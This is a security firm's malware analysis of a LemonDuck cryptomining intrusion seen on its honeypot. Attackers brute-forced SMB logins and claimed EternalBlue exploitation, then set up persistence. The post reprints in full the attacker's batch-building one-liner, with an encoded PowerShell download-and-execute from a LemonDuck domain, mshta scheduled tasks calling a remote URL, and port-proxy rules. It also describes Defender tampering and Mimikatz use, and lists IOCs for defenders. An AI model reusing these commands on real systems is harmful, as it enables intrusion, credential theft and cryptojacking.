LemonDuck Unleashes Cryptomining Attacks Through SMB Service Exploits

This post was authored by Aufa and NetbyteSEC Interns (Irham, Idham, Adnin, Nabiha, Haiqal, Amirul)

This blog post is intended to give an overall picture of LemonDuck malware exploited SMB by leveraging EternalBlue vulnerability (CVE-2017-0144) for cryptocurrency mining, based on observations from our observatory farm. EternalBlue is a significant vulnerability in Microsoft's Server Message Block (SMB) protocol that has been exploited by numerous malware variants. One such strain, LemonDuck, is a well-known cryptomining malware that takes advantage of weaknesses in SMB services to breach networks, disable security measures, and utilize system resources for cryptomining purposes. It spreads through phishing emails, exploiting SMB vulnerabilities, and using brute-force password attacks. Additionally, LemonDuck employs PowerShell to avoid detection, deploy various malicious payloads, and target systems for cryptojacking.

This blog post might be useful for security professionals with insights into current malware trends and attack techniques observed in the wild. By the end of this blog post, readers will gain a comprehensive understanding of the tactics and techniques used by this LemonDuck malware operator that compromised users via the SMB domain admin. Furthermore, security analyst can assess the provided Indicator of Compromise (IOCs) associated with LemonDuck malware variant to assess whether their environment has been compromised or not.

Case Summary

The attacker initiated a brute force attack in the vulnerable SMB service leveraging Eternal Blue (CVE-2017-0144) vulnerability which was running on our observatory farm, successfully compromising the user "Administrator". Upon gaining initial access, the attacker creates a hidden administrative share for the C: drive enabling them to remotely access the entire drive without the victim's knowledge. The attacker created a batch file named p.bat, designed to execute a series of malicious actions aimed at gaining persistent control over a system. It first creates and copies malicious file msInstall.exe, then rename it into FdQn.exe, opens specific firewall ports and sets up port forwarding to redirect traffic to a remote address (1.1.1.1) on port 53. The script checks for PowerShell and, if found, runs a base64-encoded PowerShell script to download and execute script from remote URL and schedule the execution of FdQn.exe regularly. If PowerShell isn't available, it creates scheduled tasks to run malicious payloads from a remote URL using mshta, and executes the malware installed.exe. It also includes anti-detection mechanisms by monitoring the number of open command prompts and forcing a system reboot if more than 10 are detected, likely to disrupt analysis or debugging efforts. 

Finally, it cleans up by deleting the batch file itself after execution. Additionally, the attacker also create another malicious executable that disguised a legitimate system service named svchost.exe. This malware was able to disable Windows Defender’s real-time protection and create exclusions for the entire C: drive and the PowerShell process to avoid detection. Similarly with the previous, the script manipulates the firewall and sets up port forwarding to redirect traffic to a remote address (1.1.1.1) on port 53, commonly used for DNS. It copies and renames malicious executables (svchost.exe, dig.exe) into (HbxbVCnn.exe, SgcwqM.exe) and sets up scheduled tasks to run these files at regular intervals, ensuring persistence. The script also interacts with other scheduled tasks, including deleting and recreating them for continued execution of the malware. This malware attempts to bypass security measures, gain network control, and maintain persistence on the system while executing hidden tasks. By the end of their operation, the attacker delete the administrative share in order to hide their tracks or eliminate the administrative shares where they can maintain control of the compromised system exclusively for themselves.

Figure 1: Graph flow of the attack

Technical Analysis

Brute-force SMB for Initial Access

In the initial access phase, the attacker with IP address 211.22.131.99 initiated brute-forcing activities targeting the SMB machine and successfully logged in as a local user named Administrator. Figure below illustrates some of the account names tested during the brute force attempts.

Figure 2: The attacker with IP 211.22.131.99 carry out a brute force attack

According to IPThreat, the IP address 211.22.131.99 originated from Taichung City, Taiwan has been flagged by 5 vendors and has been reported as "brute force" activities on RDP by Servinformatica and Anonymous on IPThreat, raising concerns about potential malicious behavior. Hence, we can conclude that the IP address is malicious and will continuously attempt brute force attacks, posing a significant threat to organization's security.

Figure 3: IP 211.22.131.99 reported as "brute force" activities in IPThreat

Creating a Hidden Administrative Share

Upon login into the account, the attacker creates a hidden administrative share for the C: drive on the local machine. This administrative share allows users with appropriate administrative credentials to access the root of the C drive remotely over the network. Creating a hidden administrative share on the C: drive allows attackers remote access, persistence, and an easier way to evade detection while performing malicious activities.

Figure 4: Hidden administrative share command

Figure 5: The C drive is accessible remotely through SMB service

Exploitation and Persistence

After the attacker successfully created a hidden administrative share, the attacker executed a one-liner command that initiated a series of malicious actions. Figure below shows the command executed that append string "oEAZjlit" into msInstall.exe in c:\windows\temp directory. Then, the batch file p.bat was created that copy msInstall.exe and renamed it into FdQn.exe in c:\windows directory. Another file named eb.txt was created in c:\windows\temp\ that writes a single asterisk *, might be used as a marker thar triggers the next stage of a multi-step attack or process.

Figure 6: A batch file named p.bat created that copy msInstall.exe and renamed it into FdQn.exe

Below is a full command that was executed:

cmd /c echo oEAZjlit >> c:\windows\temp\msInstall.exe&echo copy /y c:\windows\temp\msInstall.exe c:\windows\FdQN.exe>c:/windows/temp/p.bat&echo "*" >c:\windows\temp\eb.txt&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65529 DNSS3  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgALgBjAG8AbQAvAGcAaQBtAC4AagBzAHAAJwApAA==^&schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn NFUBffk /tr "c:\windows\FdQN.exe" /F) else start /b sc start Schedule^&ping localhost^&sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.zz3r0.com/page.html?pSVR-ESCWEBAPP"^&schtasks /run /TN Autocheck^&schtasks /delete /TN NFUBffk /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN NFUBffk /tr "c:\windows\FdQN.exe"^&schtasks /run /TN NFUBffk^&schtasks /delete /TN Autoload /f^&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr "c:\windows\temp\installed.exe"^&schtasks /run /TN Autoload^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f  %%i in ('tasklist ^^^| find /c /i "cmd.exe"'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo del c:\windows\temp\p.bat>>c:/windows/temp/p.bat&echo c:\windows\temp\installed.exe>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat&cmd /c c:\windows\temp\installed.exe

Figure below shows all the processes running under p.bat. The processes include network exploitation setup, download and execute script, setting up scheduled tasks, start the driver, and cleanup and final execution.

Figure 7: Process running under batch file p.bat

Network Exploitation Setup

The script starts by installing IPv6 and then configures the firewall to open TCP ports 65532, 65531, and 65529 under the DNS2, DNSS2, and DNSS3 rules, respectively. Each port is set up with a proxy that directs traffic from the local workstation to IP address 1.1.1.1 on port 53, commonly used for DNS, disguising the outbound connections as normal network activity. These network configurations are commonly associated with behaviour in cryptomining attacks, where the goal would be to silently leverage the machine's processing power for cryptocurrency mining while avoiding detection by security tools.

Figure 8: TCP ports open

Download and Execute Script

The script verifies the presence of PowerShell in the system directory. If the PowerShell exists, it employs a Base64-encoded command to download and execute a script from a remote server (http://t.amynx.com/gim.jsp). Additionally, VirusTotal flagged this URL as malicious. Further analysis was conducted, it was identified that the URL associated to crypto mining activities and the LemonDuck malware. Cisco Talos Blog also has been shared the IOC related to LemonDuck which is one of the hostname is T[.]AMYNYX[.]COM.

https://blog.talosintelligence.com/lemon-duck-brings-cryptocurrency-miners/ 

Figure 9: Detection of http://t.amynx.com/gim.jsp in VirusTotal

Figure 10: Detection of http://t.amynx.com/gim.jsp as LemonDuck malware

Setup Scheduled Task

To ensure persistence, the script establishes scheduled task named "NFUBffk" that was configured to execute "FdQN.exe" every 60 minutes, beginning at 07:05 AM, thereby ensuring regular execution of this malware. This executable file associated with LemonDuck malware which will be discussed later.

Figure 11: Schedule task named NFUBffk configured to execute FdQN.exe

If the PowerShell not exist, it starts the Windows Schedule service and pings localhost, then checks if the Schedule service is running. The script delete the existing Autocheck task and recreate with the similar name that use mshta to execute a script from a remote URL (http://w.zz3r0.com/page.html?pSVR-ESCWEBAPP). The newly created Autocheck task was run, then delete NFUBffk task if it exists, and recreates it to run every 50 minutes, executing FdQn.exe. This ensures that both Autocheck and NFUBffk tasks are in place and running, allowing the malware to execute at regular intervals and maintain persistence. Besides, the script also delete existing Autoload task and recreates it to run every 10 minutes, executing installed.exe from the temp folder.

Start the Driver

net start Ddriver >> c:/windows/temp/p.bat 

echo for /f %%i in ('tasklist ^^^| find /c /i "cmd.exe"') do set s=%%i >> c:/windows/temp/p.bat 

The script attempts to start a service called Ddriver, then monitors the number of running command prompts (cmd.exe). If more than ten instances are detected, it triggers a system shutdown and reboot. This may be a tactic to to evade detection and hinder manual analysis.

Cleanup and Final Execution

echo del c:\windows\tempt\p.bat >> c:/windows/temp/p.bat

echo c:\windows\temp\installed.exe >> c:/windows/temp/p.bat

Finally, the script deletes itself, p.bat and executes installed.exe, ensuring that the malicious activities continue without leaving the batch file behind as evidence. This cleanup step helps to obscure the attack's origins and reduce the chances of detection. 

Following the sequence of the attack, the attacker executed another one-liner command containing several functions for exploitation, which is crucial to highlight. Notably, some commands from the previous execution were repeated.

Figure 12: One-liner command executed that contain a series of malicious activities

Creating and Executing Malicious File

A malicious executable svchost.exe, a malware that disguised as a legitimate system process was created in "C:\Windows\Temp" directory and was executed. It writes a single * character into ipc.txt, act as signal or marker indicating that the malware has either successfully completed its current tasks or it is ready to proceed with the next stage of the attack. This file-based signaling mechanism is often used in malware to coordinate actions between different components or steps in an attack. 

Disabling Windows Defender and Network Configurations

The script, then disables Windows Defender real-time monitoring and adds the entire C:\ drive to the exclusion list. Next, it opens TCP port 65529 in the firewall and sets up a port proxy to forward traffic from this port to an external IP 1.1.1.1 on port 53 (DNS). This is likely used for Command and Control (C2) communication, allowing the attacker to control the infected system remotely or exfiltrate data. This is a critical step for malware, as it helps evade detection and prevents security software from scanning files and processes during execution.

Moving and Renaming the Malicious File

The malicious files svchost.exe located in "C:\Windows\Temp"  directory was copied and renamed into HbxhVCnn.exe within the same directory. At a same time, another executable named dig.exe located in "C:\Windows\Temp"  was renamed into sgcwqM.exe and moved to "C:\Windows\" directory. By changing the filenames, the attacker is making it difficult for signature-based antivirus software to flag the files, as these new names (HbxhVCnn.exe and sgcwqM.exe) might not be associated with known malware.

Downloading Script and Setting Up Scheduled Tasks 

The script checks the whether the PowerShell exists or not. If it is exist, the attacker, then, attempted to execute similar commands which is downloading the script from http://t.amynx.com/gim.jsp and create multiple schedule tasks that are designed to run every 10 minutes, executing the files HbxhVCnn.exe and sgcwqM.exe.

If the PowerShell not exist, it runs an alternate set of commands that starts the Windows Task Scheduler service (it it's not already running), pings localhost and checks for running schedule tasks. Then, it deletes the existing scheduled tasks named Autocheck and Autostart and replace with a new task that runs every 50 minutes. This new task named Autocheck executes a command that uses mshta to execute a script from a malicious URL (http://w.zz3r0.com/page.html?pSVR-ESCWEBAPP), possibly to download more malware or load additional malicious payloads, which can further compromise the system or facilitate additional malicious activities. This URL was flagged as malicious by VirusTotal. Further analysis revealed that this URL have a connection with “http://t.amynx.com/gim.jsp" as shown in Figure 13.

Figure 13: A report that shows relation between w.zz3r0.com and http://t.amynx.com/gim.jsp

The logs also captured the execution of similar commands throughout the entire project with different task names for persistence as shown in Figure 14.

Figure 14: List of schedule tasks with different names

Malware Technical Analysis and Reverse Engineering

Initial Assessment

From IP address 211.22.131.99, there are two executable files found which are FdQN.exe (msInstall.exe) and skuAtH.exe (svchost.exe). Based on the VirusTotal result, msInstall.exe shows a high detection rate among various antivirus signatures, identifying it as the LemonDuck variant of malware.

Figure 15: Report of msInstall.exe in VirusTotal

Script Walkthrough

In this section, our team will highlight a notable functions after reversing the executable file named msInstall.exe which has been detected as LemonDuck malware variant.

Bruteforce Attack

The function iterates through a list of usernames (userlist) and passwords (passlist), attempting to authenticate each combination on the targeted IP using the exploit function, trying each combination on the target IP using the exploit function. 

Figure 16: Bruteforce attempt 

userlist() and pslist()

Figure 17: List of credentials of the server

exploit()

The exploit function targets remote systems by exploiting the SMB leveraging Eternal Blue (CVE-2017-0144) vulnerability. It identifies the target's OS, escalates privileges to gain SYSTEM-level access, and logs in with the provided credentials before choosing the appropriate exploitation method.

Figure 18: Login and retrieve target OS

Figure 19: Exploitation method

smb_pwn()

From this code in Figure 20, our team identified that it performs the following activities:

• smb_send_file() function copy an executable (msInstall.exe) file to the C:\windows\temp directory on the remote system, the script renames the file to FdQn.exe and creates a batch file (p.bat).
• A series of activities associated with the batch file include commands to copy the renamed executable, create scheduled tasks, modify firewall rules, and initiate network communication through open ports (65531 and 65532).
• Scheduled task for persistence: Several scheduled tasks are created and managed to ensure the malware is executed at regular intervals, such as every 10 or 50 minutes. They point to the FdQn.exe files, including those downloaded from malicious URLs (http://w.zz3r0.com/page.html).
• Privilege escalation and system monitoring: The script checks if PowerShell is available on the system. If found, it uses PowerShell to download a remote script from the specified URL (http://t.amynyx.com/gim.jsp) and immediately executes it on the system.
• System service manipulation: The script restarts or manipulates system services like Ddriver and uses schtasks to run malicious executables on a schedule.

The goal of this process is to maintain control over the target system by making it harder to detect and ensuring persistence through repeated execution.

Figure 20: A code that perform series of malicious activities

mmka()

At the end of the script, there is a function mmka() 

Figure 21: Calling Mimikatz function

Upon inspection and mmka() function, it is actually to execute mimikatz. 

Figure 22: Mimikatz code execution

Mimikatz is a powerful post-exploitation tool used to extract and manipulate credentials from Windows systems. It can retrieve plaintext passwords, NTLM hashes, and Kerberos tickets, enabling attacks like pass-the-hash and pass-the-ticket. LemonDuck malware operator might leverage Mimikatz as part of its infection strategy to steal credentials and move laterally across compromised networks.

Conclusion

In conclusion, the LemonDuck malware exploits the SMB services by leveraging Eternal Blue (CVE-2017-0144) vulnerability. Upon successfully gaining initial access, the attacker create malicious batch file and executable file the are able to manipulate network settings, and set up multiple scheduled tasks to execute malware and also able to retrieve malicious code from remote URLs, ensuring persistence on the compromised system. To maintain stealth and evade detection, the attacker disable Windows Defender real-time monitoring, add the C: drive to the exclusion list, and modifies the malicious files by renaming or moving them in c:\windows directory. The techniques employ by the attacker to ensure continuous operation of the malware while attempting to evade detection. Hence, it is crucial for organizations to ensure that all operating systems and software are regularly updated to protect against known vulnerabilities, including EternalBlue (CVE-2017-0144) to minimize the risk from being compromised.

Indicator of Compromise (IOC)

Hash

msInstall.exe (MD5: 3ca77a9dfa6188ed9418d03df61fea7a) 

Domain

t.amynx.com (URL: http://t.amynx.com/gim.jsp)

w.zz3r0.com (URL: http://w.zz3r0.com/page.html?pSVR-ESCWEBAPP)

IP Address

211.22.131.99 (Taichung, Taiwan)

TTP

• Exploit Public-Facing Application T1190
• Command and Scripting Interpreter: PowerShell T1059.001
• Command and Scripting Interpreter: Windows Command Shell T1059.003
• Valid Accounts T1078.001
• Scheduled Task/Job T1053.005
• Impair Defenses: Disable or Modify Tools T1562.001
• Impair Defenses: Disable or Modify System Firewall T1562.004